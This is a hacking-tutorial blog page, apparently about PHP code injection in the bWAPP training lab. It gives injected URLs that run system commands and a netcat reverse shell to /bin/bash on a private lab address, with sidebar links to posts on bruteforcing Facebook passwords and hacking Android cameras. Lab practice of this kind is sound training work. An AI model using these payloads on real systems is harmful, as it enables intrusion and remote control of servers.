Ethical Hacking Playground

hacking is curiosity

Search for:

Menu

Home
Resume
Videos
Merch
Bug Bounty

PHP Code Injection

Commands

Listen for a connection


nc -lvp 4444

list the files


http://192.168.20.131/bWAPP/phpi.php?message=system('ls')

view the hostname


http://192.168.20.131/bWAPP/phpi.php?message=system('hostname')

Make a connection to the remote host


http://192.168.20.131/bWAPP/phpi.php?message=system('nc -vn 192.168.20.131 4444 -e /bin/bash')

Demonstration

If you have any questions please comment below.

Share this:

Click to share on Facebook (Opens in new window)
Click to share on LinkedIn (Opens in new window)
Click to share on Twitter (Opens in new window)
Click to print (Opens in new window)

Like this:

Like Loading...

YouTube Channel

Login with Patreon

Privacy & Cookies: This site uses cookies. By continuing to use this website, you agree to their use.
To find out more, including how to control cookies, see here: Cookie Policy

Top Posts & Pages

Extract Email, Phone Numbers of Facebook friends with OSIF Tool | Kali Linux
Videos
Social Engineering Toolkit - Credential Harvester Attack (Port-Forwarding)
Android Exploitation Setting up the Lab
Bruteforcing Facebook Passwords
How to Install OSIF Inside Termux
10 Most Used Black Hat Hacking Tools | Kali Linux
Tube8 Reflected XSS Hackerone Discolosure
PHP Code Injection
How to Hack Android Phones And Active The Camera With Hakku

Community

Recent Posts

M4: Bug Bounty | SSRF December 21, 2020
M2: Advanced XSS Techniques! December 21, 2020
M1: Advanced Recon December 21, 2020
M3: Advanced CSRF Techniques!!! December 21, 2020
Check out my Redubble!!! December 21, 2020

Blog Stats

92,548 hits

Loading Comments...

Write a Comment...

Email (Required)

Name (Required)

Website

%d bloggers like this: